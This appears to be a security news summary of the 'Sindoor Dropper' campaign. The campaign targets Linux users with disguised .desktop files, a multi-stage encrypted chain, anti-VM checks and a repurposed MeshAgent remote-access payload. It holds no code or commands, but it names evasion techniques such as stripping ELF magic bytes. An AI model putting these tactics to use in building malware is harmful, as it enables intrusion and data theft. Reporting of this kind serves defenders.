New ‘Sindoor Dropper’ Malware Targets Linux Systems Using Malicious .desktop Files

A new malware campaign, known as “Sindoor Dropper,” is specifically targeting Linux systems through sophisticated spear-phishing techniques and a multi-stage infection chain. This campaign cleverly utilises lures related to the recent India-Pakistan conflict, referred to as Operation Sindoor, to entice victims into executing malicious files. A notable aspect of this activity is its use of weaponised .desktop files, a tactic previously linked to the advanced persistent threat (APT) group APT36, also recognised as Transparent Tribe or Mythic Leopard. The attack commences when a user opens a malicious .desktop file named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which disguises itself as a standard PDF document. According to Nextron’s system analysis, upon execution, it presents a benign decoy PDF to maintain the illusion of legitimacy while silently initiating a complex and heavily obfuscated infection process in the background.

The infection process is meticulously designed to evade both static and dynamic analysis, with the initial payload reportedly showing zero detections on VirusTotal at the time of its discovery. The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd). The decryptor, a Go binary packed with UPX, is intentionally corrupted by stripping its ELF magic bytes to bypass security scans on platforms like Google Docs. The .desktop file restores these bytes on the victim’s machine, making the binary executable again. This initiates a multi-stage process where each component decrypts and executes the next. The chain incorporates basic anti-virtual machine checks, such as verifying board and vendor names, blacklisting specific MAC address prefixes, and checking machine uptime. All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further complicate analysis. The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance, granting the attacker full remote access to the compromised system. This access enables the attacker to monitor user activity, move laterally across the network, and exfiltrate sensitive data. The Sindoor Dropper campaign signifies an evolution in threat actor tradecraft, showcasing a distinct focus on Linux environments, which have been less targeted by phishing campaigns. 

Categories: Malware Campaign, Linux Targeting, Phishing Techniques 

Tags: Sindoor Dropper, Malware, Linux, Spear-Phishing, Infection Chain, .desktop Files, AES Decryptor, Command-and-Control, Remote Access, Phishing Campaigns